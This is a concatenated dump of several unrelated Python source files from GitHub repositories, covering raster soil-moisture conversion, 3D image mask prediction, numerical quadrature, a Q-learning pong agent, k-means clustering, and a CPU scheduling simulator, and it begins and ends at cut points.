clay:str, sand:str, savepath:str, fname:str = None, ext:str = \"vol\", nodata:float = None)->str:\n\n if fname is None:\n fname = os.path.splitext(ssm)[0] + \"_\" + ext + \".tif\"\n \n rclay = os.path.splitext(clay)[0] + \"_reproj.tif\"\n \n reproj_match(clay, ssm, rclay)\n\n rsand = os.path.splitext(sand)[0] + \"_reproj.tif\"\n \n reproj_match(sand, ssm, rsand)\n \n SSM = rasterio.open(ssm)\n metadata = SSM.meta.copy()\n MASK = rasterio.open(mask)\n CLAY = rasterio.open(rclay)\n SAND = rasterio.open(rsand)\n \n clay_array = CLAY.read().astype(np.float32)\n sand_array = SAND.read().astype(np.float32)\n\n theta_res = 0.15 * clay_array*0.01\n theta_sat = 0.489 - 0.126 * sand_array*0.01\n \n del(clay_array, sand_array)\n gc.collect()\n\n ssm_array = SSM.read().astype(np.float32)\n mask = MASK.read()\n\n ssm_vol_array = theta_res + (theta_sat - theta_res) * ssm_array * 0.01\n if nodata is None:\n ssm_vol_array[mask == 1] = metadata[\"nodata\"]\n else:\n ssm_vol_array[mask == 1] = nodata\n metadata.update(nodata = nodata)\n\n metadata.update(dtype = ssm_vol_array.dtype)\n\n write_image(os.path.join(savepath, fname), ssm_vol_array, metadata)\n\n return fname","repo_name":"rslab-ntua/DisPATCh","sub_path":"DisPATCh/ssm.py","file_name":"ssm.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21739367291","text":"import numpy as np\nimport skimage\n\ndef predict_mask(model, image_path, image_size, patch_size):\n latticeMovieImage = skimage.external.tifffile.imread(image_path)\n latticeMovieImage = latticeMovieImage[:image_size, :image_size, :image_size]\n result = np.zeros((image_size, image_size, image_size, 1))\n\n for x in range(image_size//patch_size):\n for y in range(image_size//patch_size):\n for z in range(image_size//patch_size):\n x_index = x*patch_size\n y_index = y*patch_size\n z_index = z*patch_size\n \n current_lattice_patch = latticeMovieImage[x_index:x_index+patch_size, y_index:y_index+patch_size, z_index:z_index+patch_size]\n current_lattice_patch = current_lattice_patch.reshape(1, patch_size, patch_size, patch_size, 1)\n \n result_patch = model.predict(current_lattice_patch)\n for i in range(patch_size):\n for j in range(patch_size):\n for k in range(patch_size):\n result_pixel = result_patch[0, i, j, k, 0]\n result[x_index+i, y_index+j, z_index+k, 0] = result_pixel\n \n return result.reshape(1, image_size, image_size, image_size, 1)\n\n#Automatically trim image of rectangular shape and generate patches\ndef predict_mask(model, image_path, patch_size, offset=np.zeros((3,), dtype=int)):\n assert offset.size is 3, \"Offset array needs to have a size of 3.\"\n \n latticeMovieImage = skimage.external.tifffile.imread(image_path)\n x_extra = latticeMovieImage.shape[0]%patch_size\n x_size = latticeMovieImage.shape[0] - x_extra\n if offset[0] > x_extra:\n print(\"1st dim offset exceeds image dim\")\n offset[0] = 0\n \n y_extra = latticeMovieImage.shape[1]%patch_size\n y_size = latticeMovieImage.shape[1] - y_extra\n if offset[1] > y_extra:\n print(\"2st dim offset exceeds image dim\")\n offset[1] = 0\n \n z_extra = latticeMovieImage.shape[2]%patch_size\n z_size = latticeMovieImage.shape[2] - z_extra\n if offset[2] > z_extra:\n print(\"3rd dim offset exceeds image dim\")\n offset[2] = 0\n \n latticeMovieImage = latticeMovieImage[offset[0]:x_size+offset[0], offset[1]:y_size+offset[1], offset[2]:z_size+offset[2]]\n print(\"Image cropped to: \" + str(x_size) + \", \" + str(y_size) + \", \" + str(z_size))\n result = np.zeros((x_size, y_size, z_size, 1))\n\n for x in range(x_size // patch_size):\n for y in range(y_size // patch_size):\n for z in range(z_size // patch_size):\n x_index = x * patch_size\n y_index = y * patch_size\n z_index = z * patch_size\n\n current_lattice_patch = latticeMovieImage[x_index:x_index + patch_size, y_index:y_index + patch_size,\n z_index:z_index + patch_size]\n current_lattice_patch = current_lattice_patch.reshape(1, patch_size, patch_size, patch_size, 1)\n\n result_patch = model.predict(current_lattice_patch)\n for i in range(patch_size):\n for j in range(patch_size):\n for k in range(patch_size):\n result_pixel = result_patch[0, i, j, k, 0]\n result[x_index + i, y_index + j, z_index + k, 0] = result_pixel\n\n return result.reshape(1, x_size, y_size, z_size, 1)","repo_name":"abdo-projects/pyLattice_deepLearning","sub_path":"src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"3370710363","text":"import numpy as np\n\n\ndef moments(max_s, xl, xr, a=None, b=None, alpha=0.0, beta=0.0):\n \"\"\"\n Вычисляем моменты весовой функции с 0-го по max_s-ый на интервале [xl, xr]\n Весовая функция: p(x) = 1 / (x-a)^alpha / (b-x)^beta, причём гарантируется, что:\n 1) 0 <= alpha < 1\n 2) 0 <= beta < 1\n 3) alpha * beta = 0\n\n :param max_s: номер последнего момента\n :return: список значений моментов\n \"\"\"\n assert alpha * beta == 0, f'alpha ({alpha}) and/or beta ({beta}) must be 0'\n\n if alpha == 0 and beta == 0:\n return [(xr ** s - xl ** s) / s for s in range(1, max_s + 2)]\n\n if alpha != 0.0:\n assert a is not None, f'\"a\" not specified while alpha != 0'\n\n array = []\n for s in range(0, max_s + 1):\n sum = 0\n for i in range(1, s + 2):\n to_add = 0\n to_add += (xr - a) ** (-alpha + i) * xr ** (s + 1 - i) * (-1) ** (i + 1)\n to_add -= (xl - a) ** (-alpha + i) * xl ** (s + 1 - i) * (-1) ** (i + 1)\n\n for k in range(1, i + 1):\n to_add /= (-alpha + k)\n\n for k in range(0, i - 1):\n to_add *= s - k\n\n sum += to_add\n array.append(sum)\n\n return array\n if beta != 0.0:\n assert b is not None, f'\"b\" not specified while beta != 0'\n\n array = []\n for s in range(0, max_s + 1):\n sum = 0\n for i in range(1, s + 2):\n to_add = 0\n to_add -= (b - xr) ** (-beta + i) * xr ** (s + 1 - i)\n to_add += (b - xl) ** (-beta + i) * xl ** (s + 1 - i)\n for k in range(1, i + 1):\n to_add /= (-beta + k)\n\n for k in range(0, i - 1):\n to_add *= s - k\n sum += to_add\n\n array.append(sum)\n\n return array\n\n m = np.zeros(max_s+1)\n return m\n raise NotImplementedError\n\n\ndef runge(s0, s1, m, L):\n \"\"\"\n Оценка погрешности последовательных приближений s0 и s1 по правилу Рунге\n\n :param m: порядок погрешности\n :param L: кратность шага\n :return: оценки погрешностей s0 и s1\n \"\"\"\n d0 = np.abs(s1 - s0) / (1 - L ** -m)\n d1 = np.abs(s1 - s0) / (L ** m - 1)\n return d0, d1\n\n\ndef aitken(s0, s1, s2, L):\n \"\"\"\n Оценка порядка главного члена погрешности по последовательным приближениям s0, s1 и s2 по правилу Эйткена\n Считаем, что погрешность равна R(h) = C*h^m + o(h^m)\n\n :param L: кратность шага\n :return: оценка порядка главного члена погрешности (m)\n \"\"\"\n if s2 == s1 or s1 == s0 or ((s2-s1)/(s1-s0) < 0):\n return -1\n else:\n return -np.log((s2-s1)/(s1-s0))/np.log(L)\n raise NotImplementedError\n\n \"\"\"\n В 89 строке мы возврощаем \"-1\", так как значение квадратурных сумм могут совподать или же подлогарифмическое \n выражение может быть отрицательным (квадратурные суммы могут находится с разных сторон от точной велечины интеграла).\n В данном случае это приводит к грубой оценки параметра m. \n \"\"\"\n\n\ndef quad(func, x0, x1, xs, **kwargs):\n \"\"\"\n Интерполяционная квадратурная формула\n\n :param func: интегрируемая функция\n :param x0, x1: интервал\n :param xs: узлы\n :param kwargs: параметры весовой функции (должны передаваться в moments)\n :return: значение ИКФ\n \"\"\"\n m = moments(len(xs) - 1, x0, x1, **kwargs)\n\n X = []\n\n for i in range(len(m)):\n v = []\n for s in xs:\n v.append(s ** i)\n X.append(v)\n\n A = np.linalg.solve(X, m)\n\n Fx = []\n\n for s in xs:\n Fx.append(func(s))\n\n result = np.dot(A, Fx)\n return result\n\n raise NotImplementedError\n\n\ndef quad_gauss(func, x0, x1, n, **kwargs):\n \"\"\"\n Интерполяционная квадратурная формула типа Гаусса\n\n :param func: интегрируемая функция\n :param x0, x1: интервал\n :param n: количество узлов\n :param kwargs: параметры весовой функции (должны передаваться в moments)\n :return: значение ИКФ\n \"\"\"\n\n m = np.array(moments(2*n - 1, x0, x1, **kwargs))\n\n C = []\n B = []\n\n for s in range(n):\n v = []\n for j in range(n):\n v.append(m[j+s])\n C.append(v)\n B.append(-m[n+s])\n\n if np.linalg.det(C) == 0:\n return 0\n\n A = np.flip(np.linalg.solve(C, B)) #меняем порядок коэффициентов для дальнейшего вычисления узлового многочлена\n A = np.insert(A, 0, 1)#добовляем первый недостоющий коэф (по алгоритму равный 1) для узлового многочлена\n X = np.roots(A)\n return quad(func, x0, x1, X, **kwargs)\n\n\n raise NotImplementedError\n\n\ndef composite_quad(func, x0, x1, n_intervals, n_nodes, **kwargs):\n \"\"\"\n Составная квадратурная формула\n\n :param func: интегрируемая функция\n :param x0, x1: интервал\n :param n_intervals: количество интервалов\n :param n_nodes: количество узлов на каждом интервале\n :param kwargs: параметры весовой функции (должны передаваться в moments)\n :return: значение СКФ\n \"\"\"\n mesh = np.linspace(x0, x1, n_intervals + 1)\n return sum(quad(func, mesh[i], mesh[i+1], interval(n_nodes, mesh[i], mesh[i+1]), **kwargs) for i in range(n_intervals))\n raise NotImplementedError\n\ndef interval(n, xl, xr):\n if n == 1:\n return[0.5*(xl+xr)]#в случае единсвтенной узловой точки, устанавливаем ее на середину\n else:\n return np.linspace(xl, xr, n)#делаем равностоящие узлы\n\ndef integrate(func, x0, x1, tol):\n \"\"\"\n Интегрирование с заданной точностью (error <= tol)\n\n Оцениваем сходимость по Эйткену, потом оцениваем погрешность по Рунге и выбираем оптимальный размер шага\n Делаем так, пока оценка погрешности не уложится в tol\n\n :param func: интегрируемая функция\n :param x0, x1: интервал\n :param tol: допуск\n :return: значение интеграла, оценка погрешности\n \"\"\"\n N = 1 #intervals\n n_nodes = 2 #nodes\n L = 2\n\n S_0 = composite_quad(func, x0, x1, N, n_nodes)\n N *= L\n S_1 = composite_quad(func, x0, x1, N, n_nodes)\n N *= L\n S_2 = composite_quad(func, x0, x1, N, n_nodes)\n\n m = aitken(S_0, S_1, S_2, L)\n\n d0, d1 = runge(S_0, S_1, m, L)\n\n while d1 > tol:#изменяем размерности сеток до тех пор, пока не добьемся заданной точности вычисления(tol)\n S_0 = S_1\n S_1 = S_2\n N *= L\n S_2 = composite_quad(func, x0, x1, N, n_nodes)\n m = aitken(S_0, S_1, S_2, L)\n d0, d1 = runge(S_0, S_1, m, L)\n \n return S_1, d1\n raise NotImplementedError\n","repo_name":"ACE-777/CHM","sub_path":"S3T1_integration/py/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":8129,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15244593541","text":"# Given a number N.Find Sum of 1 to N Using Recursion\n\n# Input\n# 5\n\n# Output\n# 15\n\n# Hints\n# Make a recursive function to get the sum\n\n# Code\nn = int(input(\"Enter no to find sum: \"))\n\n\ndef recurssion(n):\n if n == 0:\n return n\n return recurssion(n-1) + n\n\n\nsum = recurssion(n)\nprint(sum)\n","repo_name":"nandinichhajed/Python-Codes","sub_path":"Day-24/103.Sum of 1 to N Using Recursion.py","file_name":"103.Sum of 1 to N Using Recursion.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"26682406290","text":"class Save:\r\n\tdef __init__(self, hp, ep, lv):\r\n\t\tself.hp = hp\r\n\t\tself.ep = ep\r\n\t\tself.lv = lv\r\n\tdef notification(self):\r\n\t\tprint('HP : ' + self.hp)\r\n\t\tprint('EP : ' + self.ep)\r\n\t\tprint('Lv : ' + self.lv)\r\n\r\nlv_a = 23\r\nep_a = 12\r\nhp_a = 2\r\n\r\nlv_b = 99\r\nep_b = 999\r\nhp_b = 999\r\n\r\nsave_data_a = Save(hp_a, ep_a, lv_a)\r\nsave_data_b = Save(hp_b, ep_b, lv_b)\r\n\r\nprint(save_data_a.notification())\r\nprint(save_data_b.notification())","repo_name":"nyqtofovian/py_folder","sub_path":"test14.py","file_name":"test14.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1338686968","text":"from sklearn import tree, neighbors, svm\r\nimport numpy as np\r\nfrom random import shuffle\r\n\r\nx=[]\r\nl=[]\r\ntest_x=[]\r\ntest_l=[]\r\n\r\nfor i in range(10000):\r\n rnd = np.random.randint(0, high=2)\r\n if rnd == 0:\r\n y=[]\r\n y.append(np.random.randint(100,high=200))\r\n y.append(np.random.randint(10,high=25))\r\n x.append(y)\r\n l.append(1)\r\n else:\r\n y=[]\r\n y.append(np.random.randint(150,high=250))\r\n y.append(np.random.randint(15,high=35))\r\n x.append(y)\r\n l.append(2)\r\n\r\ntest_x = x[-100:]\r\ntest_l = l[-100:]\r\n\r\nsum_acc=[]\r\nfor i in range(50):\r\n## clf = tree.DecisionTreeClassifier()\r\n## clf = neighbors.KNeighborsClassifier()\r\n clf = svm.SVC()\r\n clf.fit(x[:900],l[:900])\r\n acc=clf.score(test_x,test_l)\r\n sum_acc.append(acc)\r\nprint(np.mean(sum_acc))\r\n\r\n","repo_name":"moonblood2/opencv","sub_path":"googl_ml.py","file_name":"googl_ml.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71178254132","text":"import random, itertools\nimport numpy as np\n\nclass State:\n def __init__(self, ball, paddle, x_vel, y_vel):\n self.ball_loc = ball\n self.paddle_loc = paddle\n self.x_vel = x_vel\n self.y_vel = y_vel\n\n def __hash__(self):\n return hash((self.ball_loc, self.x_vel, self.y_vel, self.paddle_loc))\n\n def __eq__(self, other):\n if self.ball_loc == other.ball_loc and self.paddle_loc == other.paddle_loc \\\n and self.x_vel == other.x_vel and self.y_vel == other.y_vel:\n return True\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n return str((self.ball_loc, self.x_vel, self.y_vel, self.paddle_loc))\n\n def fail(self):\n if self == State((-1,-1), 0, 0, 0):\n return True\n return False\n\ndef random_state():\n ball_x = random.uniform(0,1)\n ball_y = random.uniform(0,1)\n x_vel = .03 * random.choice([-1,1])\n y_vel = .03 * random.choice([-1,0,1])\n paddle = random.uniform(0,.8)\n\n return (ball_x, ball_y, x_vel, y_vel, paddle)\n\ndef main():\n gamma = .9\n paddle_height = .2\n init_state = (.5, .5, .03, .01, .5 - paddle_height/2)\n cur_state = init_state\n states = {}\n hit = 0\n games = 0\n alpha = .00005\n\n for x in range(15):\n for y in range(15):\n for paddle in range(15):\n for xvel in [-1,1]:\n for yvel in [-1,0,1]:\n new_state = State((x,y), paddle, xvel, yvel)\n states[new_state] = (0,0,0)\n states[State((-1,-1), 0, 0, 0)] = (-1,-1,-1)\n\n while True:\n cur_state, states, hit = step(cur_state, states, hit, alpha, gamma)\n discrete = discretize(cur_state)\n if discrete.fail():\n games += 1\n # alpha = 1000/(1000 + games)\n # print(games)\n if games % 10000 == 0:\n count = 0\n xhit = 0\n while count < 1001:\n xhit += final_q(init_state, states, 0, 0)\n count += 1\n print(xhit/1000)\n # cur_state = random_state()\n cur_state = init_state\n hit = 0\n\n\ndef final_q(cur_state, states, hit, step):\n disc = discretize(cur_state)\n\n if disc.fail():\n return hit\n\n val = states[disc]\n if val[1] < val[0] > val[2]:\n new_state, _, n_hit = next_state(cur_state, 0, hit)\n elif val[0] < val[1] < val[2]:\n new_state, _, n_hit = next_state(cur_state, 2, hit)\n else:\n new_state, _, n_hit = next_state(cur_state, 1, hit)\n\n n_hit = final_q(new_state, states, n_hit, step+1)\n return n_hit\n\n\n\ndef print_board(state):\n for x in range(15):\n for y in range(15):\n if state.ball_loc == (x,y):\n print(\"o\", end='')\n elif x == 14 and y == state.paddle_loc:\n print('_', end='')\n else:\n print(' ', end='')\n print()\n print('-----------------------')\n\n\ndef step(state, discrete_states, hit, alpha, gamma):\n action = random.randint(0,2)\n disc = discretize(state)\n\n new_state, q, hit = next_state(state, action, hit)\n q += gamma * max_q(new_state, discrete_states)\n val = discrete_states[disc]\n td_val = val[action] + alpha*(q-val[action])\n\n if action == 0:\n discrete_states[disc] = (td_val, val[1], val[2])\n elif action == 1:\n discrete_states[disc] = (val[0], td_val, val[2])\n else:\n discrete_states[disc] = (val[0], val[1], td_val)\n\n return new_state, discrete_states, hit\n\n\ndef max_q(state, discrete_states):\n disc = discretize(state)\n val = discrete_states[disc]\n if val[1] < val[0] > val[2]:\n return val[0]\n elif val[0] < val[1] < val[2]:\n return val[2]\n else:\n return val[1]\n\ndef next_state(state, action, hit):\n new_xvelo = state[2]\n new_yvelo = state[3]\n reward = 0\n\n new_xpos = state[0] + state[2]\n if new_xpos < 0:\n new_xpos = -new_xpos\n new_xvelo = -new_xvelo\n\n new_ypos = state[1] + state[3]\n if new_ypos < 0:\n new_ypos = -new_ypos\n new_yvelo = -new_yvelo\n elif new_ypos > 1:\n new_ypos = 2 - new_ypos\n new_yvelo = -new_yvelo\n\n if new_xpos >= 1 and (state[4] <= new_ypos <= state[4] + .2):\n new_xpos = 2 - new_xpos\n u = random.uniform(-.015, .015)\n v = random.uniform(-.03, .03)\n new_xvelo = -new_xvelo + u\n if 0 < new_xvelo < .03:\n new_xvelo = .03\n elif -.03 < new_xvelo <= 0:\n new_xvelo = -.03\n new_yvelo += v\n hit += 1\n reward = 3\n elif new_xpos > 1:\n reward = -1\n\n if action == 0:\n new_paddle = state[4]\n elif action == 1:\n new_paddle = state[4] + .04\n if new_paddle > (1 - .2):\n new_paddle = .8\n elif action == 2:\n new_paddle = state[4] - .04\n if new_paddle < 0:\n new_paddle = 0\n\n new_state = (new_xpos, new_ypos, new_xvelo, new_yvelo, new_paddle)\n return new_state, reward, hit\n\ndef discretize(state):\n # if state[0] > 1:\n # import IPython\n # IPython.embed()\n if (state[0] >= 1 and not (state[4] <= state[1] <= state[4] + .2)):\n return State((-1,-1), 0, 0, 0)\n coords = (int(state[0]*14), int(state[1]*14))\n paddle = int(14 * state[4] / .8)\n if coords[0] >= 15:\n coords = (14, coords[1])\n\n if state[2] > 0:\n xvel = 1\n else:\n xvel = -1\n\n if abs(state[3]) < .015:\n yvel = 0\n elif state[3] < 0:\n yvel = -1\n else:\n yvel = 1\n\n return State(coords, paddle, xvel, yvel)\n\nmain()\n","repo_name":"jlu368/Part1MP4","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":5702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37205931172","text":"import math\nfrom collections import defaultdict\nimport random\nclass KMeans:\n def __init__(self, clusterCnt, dimensions):\n self.clusterCnt = clusterCnt\n self.dimensions = dimensions\n\n def get_distance_from_point(self, current_point, point):\n dist = 0\n for a, b in zip(current_point, point):\n dist += (a - b)**2\n return math.sqrt(dist)\n\n def pickKPointsAsClusters(self, inputDataMap, relevant_points):\n first_point = random.randint(0, len(relevant_points) - 1)\n selected_points = set()\n selected_points.add(first_point)\n while len(selected_points) < self.clusterCnt:\n global_maxi = float('-inf')\n global_point = None\n for index in relevant_points:\n dimensions = inputDataMap[index]\n current_point = dimensions\n local_mini = float('inf')\n if index in selected_points:\n continue \n for point in selected_points:\n selected_point_tuple = inputDataMap[point]\n dist = self.get_distance_from_point(current_point, selected_point_tuple)\n if dist < local_mini:\n local_mini = dist\n if local_mini > global_maxi:\n global_maxi = local_mini\n global_point = index\n selected_points.add(global_point)\n return selected_points\n\n def placePointsInNearestCentroid(self, selected_clusters, inputDataMap, relevant_points):\n res = defaultdict(list)\n for point in relevant_points:\n dimensions = tuple(inputDataMap[point])\n local_mini = math.inf\n cluster_id = None\n \n for (i, point_tuple) in selected_clusters.items():\n dist = self.get_distance_from_point(dimensions, point_tuple)\n if dist < local_mini:\n local_mini = dist\n cluster_id = i\n res[cluster_id].append(point)\n\n return res\n\n def init_n_d_vector(self, point_n_d: list, num_dimensions: int):\n n_dimensional_vector = []\n for i in range(num_dimensions):\n n_dimensional_vector.append(point_n_d[i])\n return n_dimensional_vector\n\n def updateLocationsOfKCentroids(self, cid_to_points_map, inputDataMap):\n centroid_locations = defaultdict(tuple)\n for (index, points_list) in cid_to_points_map.items():\n num_dimensions = self.dimensions\n n_dimensional_vector = [0] * num_dimensions\n for point in points_list:\n point_n_d = inputDataMap[point]\n for (i, point_dimensional_value) in enumerate(point_n_d):\n n_dimensional_vector[i] += point_dimensional_value\n for i in range(num_dimensions):\n n_dimensional_vector[i] = n_dimensional_vector[i] / len(points_list)\n centroid_locations[index] = tuple(n_dimensional_vector)\n return centroid_locations\n\n def getClusters(self, inputDataMap, relevant_points):\n selected_clusters = list(self.pickKPointsAsClusters(inputDataMap, relevant_points))\n centroids = defaultdict(tuple)\n for (i, point) in enumerate(selected_clusters):\n centroids[i] = tuple(inputDataMap[point])\n prev_assignment_map = None\n cnt = 1\n while True:\n \n cnt += 1\n if cnt > 6:\n break\n point_assignment_map = self.placePointsInNearestCentroid(centroids, inputDataMap, relevant_points)\n if prev_assignment_map:\n no_movement = True\n for key in prev_assignment_map:\n if prev_assignment_map[key] != point_assignment_map[key]:\n no_movement = False\n break\n if no_movement:\n break\n new_centroids = self.updateLocationsOfKCentroids(point_assignment_map, inputDataMap)\n centroids = new_centroids\n prev_assignment_map = point_assignment_map\n\n\n return (centroids, point_assignment_map)","repo_name":"copyrosicky/BFRAlgorithm","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38873427033","text":"class PCB(object):\n\n def __init__(self,name,arrival_time,burst_time,priority = 0):\n self.name = name\n self.arrival_time = arrival_time #到达时间\n self.burst_time = burst_time #服务时间\n self.priority = priority\n\n self.start_time = None #开始时间\n self.runned_time = 0 #已运行时间\n self.finished_time = None #结束时间\n\n def __str__(self):\n if self.runned_time != None and self.finished_time != None and self.start_time != None:\n return 'name:'+self.name + ' arrival:' + str(self.arrival_time) + ' burst:' + str(self.burst_time) +' start:' + str(self.start_time) + ' finish:' + str(self.finished_time) + ' runnned:' + str(self.runned_time) + ' priority:' + str(self.priority)+' T:'+str(self.T)+' W:'+str(self.W)\n else:\n return 'name:'+self.name + ' arrival:' + str(self.arrival_time) + ' burst:' + str(self.burst_time) + ' priority:' + str(self.priority)\n\n def initPCB(self):\n self.runned_time = 0\n self.finished_time = None\n self.start_time = None\n\nclass MultiQueue(object):\n\n def __init__(self,level):\n self.level = level\n self.queue = []\n self.nextQueue = None\n\n def __str__(self):\n return 'level:' + str(self.level)+' '+str(self.queue)+' '+str(self.nextQueue)\n\nready = []\nblock = []\nrunning = None\nfinished = []\nMAX_TIME = 100000\ndis = lambda p: 'name:' + str(p.name) + ' arrival:' + str(p.arrival_time) + ' burst:' + str(p.burst_time) + ' runned:' + str(p.runned_time)\ndef disMultiQueue(queue):\n t = queue\n while t:\n print('Level: '+str(t.level))\n print(end=' ')\n for p in t.queue:\n print(dis(p),end='\\n ')\n t = t.nextQueue\n print()\n\ndef disList(l):\n for p in l:\n print(p)\n\ndef W_and_T(finished):\n sumT = 0\n sumW = 0\n for p in finished:\n sumT += p.T\n sumW += p.W\n print('平均周转时间'+str(sumT/len(finished)),'平均带权周转时间'+str(sumW/len(finished)))\n\ndef Priority():\n temp_ready = sorted(ready,key= lambda p:p.priority, reverse=True)\n currTime = MAX_TIME\n for p in ready:\n if p.arrival_time < currTime:\n currTime = int(p.arrival_time)\n while temp_ready:\n for p in temp_ready:\n if p.arrival_time <= currTime:\n p.start_time = currTime\n p.finished_time = currTime + p.burst_time\n p.runned_time = p.finished_time - p.start_time\n p.T = p.finished_time - p.arrival_time\n p.W = p.T / p.runned_time\n print(p)\n currTime += p.burst_time\n temp_ready.remove(p)\n finished.append(p)\n break\n print('-------------------------END----------------------------')\n disList(finished)\n W_and_T(finished)\n finished.clear()\n\ndef FCFS():\n temp_ready = sorted(ready,key=lambda p:p.arrival_time,reverse=True)\n currTime = temp_ready[-1].arrival_time\n while temp_ready:\n pcb = temp_ready.pop()\n pcb.start_time = currTime\n pcb.finished_time = currTime + pcb.burst_time\n pcb.runned_time = pcb.finished_time - pcb.start_time\n pcb.T = pcb.finished_time - pcb.arrival_time\n pcb.W = pcb.T/pcb.runned_time\n currTime = currTime + pcb.burst_time\n finished.append(pcb)\n disList(finished)\n W_and_T(finished)\n finished.clear()\n for pcb in ready:\n pcb.initPCB()\n\ndef SJF():\n temp_ready = sorted(ready, key=lambda p:p.burst_time) #按服务时间从小到大排序\n currTime = MAX_TIME\n for pcb in temp_ready:\n if currTime > int(pcb.arrival_time):\n currTime = int(pcb.arrival_time)\n while temp_ready:\n for pcb in temp_ready:\n if pcb.arrival_time <= currTime:\n print(dis(pcb))\n pcb.start_time = currTime\n currTime = currTime + int(pcb.burst_time)\n pcb.finished_time = currTime\n pcb.runned_time = pcb.finished_time - pcb.start_time\n pcb.T = pcb.finished_time - pcb.arrival_time\n pcb.W = pcb.T/pcb.runned_time\n temp_ready.remove(pcb)\n finished.append(pcb)\n break\n print('----------------------------END--------------------------------------')\n disList(finished)\n W_and_T(finished)\n finished.clear()\n for p in ready:\n p.initPCB()\n\ndef TIME():\n temp_ready = sorted(ready,key=lambda p:p.arrival_time)\n do = 1\n currTime = MAX_TIME\n finished = []\n for pcb in temp_ready:\n if currTime > int(pcb.arrival_time):\n currTime = int(pcb.arrival_time)\n dis = lambda p:'name:'+str(p.name)+' arrival:'+str(p.arrival_time)+' burst:'+str(p.burst_time)+' runned:'+str(p.runned_time)\n\n while len(temp_ready) != len(finished):\n for p in temp_ready:\n if p.arrival_time <= currTime and (p not in finished):\n p.runned_time += do\n\n if p.start_time == None:\n p.start_time = currTime\n if p.runned_time == p.burst_time:\n p.finished_time = currTime\n p.T = p.finished_time - p.arrival_time\n p.W = p.T/p.runned_time\n # 共享资源问题\n finished.append(p)\n # temp_ready.remove(p)\n print('- Current time:%s'%currTime,dis(p))\n currTime += do\n print('------------------------------END------------------------------')\n disList(finished)\n W_and_T(finished)\n finished.clear()\n for p in ready:\n p.initPCB()\n\ndef addPCB(currTime,temp_ready,head):\n for p in temp_ready:\n if p.arrival_time <= currTime:\n head.queue.append(p)\n for p in head.queue:\n if p in temp_ready:\n temp_ready.remove(p)\n\ndef doQueue(head,queue,finished,currTime,temp_ready):\n \"\"\"\n :param queue: 当前队列\n :param finished: 完成队列\n :param currTime: 当前时刻\n :param temp_ready: 就绪队列\n :return: queue,finished,currTime,temp_ready\n \"\"\"\n # print('curr time:',currTime)\n addPCB(currTime,temp_ready,head) # 如果是当前时刻到达的进程,则加入第一级队列\n disMultiQueue(head) # 显示当前多级队列情况\n print('-----------------------------------------------------------------')\n if head.queue != [] and queue != head:\n return currTime\n for p in queue.queue:\n if not p.start_time:\n p.start_time = currTime\n if p.runned_time + 2**queue.level <= p.burst_time:\n p.runned_time += 2**queue.level\n currTime += 2**queue.level\n else:\n currTime += p.burst_time - p.runned_time\n p.runned_time = p.burst_time\n if p.runned_time == p.burst_time: # 如果进程完成\n p.finished_time = currTime\n p.T = p.finished_time - p.arrival_time\n p.W = p.T/p.runned_time\n finished.append(p)\n elif queue.nextQueue != None:\n t = queue.nextQueue\n t.queue.append(p)\n addPCB(currTime,temp_ready,head) # 如果是当前时刻到达的进程,则加入第一级队列\n if head.queue != [] and queue != head: # 如果有新进程加入,则回到第一级队列\n break\n\n for p in finished: # 清理完成的进程\n if p in queue.queue:\n queue.queue.remove(p)\n\n if queue.nextQueue != None:\n for p in queue.nextQueue.queue: # 清理放入下一级队列的进程\n if p in queue.queue:\n queue.queue.remove(p)\n\n if head.queue == [] and queue.nextQueue: # 如果没有新进程加入并且有下一级队列,进入下一级队列\n currTime = doQueue(head,queue.nextQueue,finished,currTime,temp_ready)\n\n return currTime\n\ndef multi_LevelQueue():\n temp_ready = sorted(ready, key=lambda p: p.arrival_time)\n currTime = temp_ready[0].arrival_time\n multiQueue = MultiQueue(0)\n tempQueue = multiQueue\n for i in range(3): # 建立多级队列\n tempQueue.nextQueue = MultiQueue(i+1)\n tempQueue = tempQueue.nextQueue\n\n finished = []\n readyLen = len(temp_ready)\n while len(finished) != readyLen:\n currTime = doQueue(multiQueue,multiQueue,finished,currTime,temp_ready)\n # disMultiQueue(multiQueue) # 显示当前多级队列情况\n # print('-----------------------------------------------------------------')\n print('-------------------------------END----------------------------------------')\n disList(finished)\n W_and_T(finished)\n finished.clear()\n for p in ready:\n p.initPCB()\n\nkeep = True\nwhile keep:\n command = input('>>>')\n command = command.split(' ')\n\n if command[0] == 'c' and len(command) == 2:\n ready.clear()\n n = int(command[1])\n for i in range(n):\n pcb_str = input()\n pcb_str = pcb_str.split(' ')\n if len(pcb_str) < 3:\n print('No.%d input error'%(i+1))\n continue\n if len(pcb_str) == 4:\n pcb = PCB(pcb_str[0], int(pcb_str[1]), int(pcb_str[2]), int(pcb_str[3]))\n elif len(pcb_str) == 3:\n pcb = PCB(pcb_str[0], int(pcb_str[1]), int(pcb_str[2]))\n ready.append(pcb)\n\n elif command[0] == 'fcfs':\n FCFS()\n\n elif command[0] == 'sjf':\n SJF()\n elif command[0] == 'time':\n TIME()\n\n elif command[0] == 'pri':\n Priority()\n elif command[0] == 'mul':\n multi_LevelQueue()\n\n elif command[0] == 'exit':\n keep = 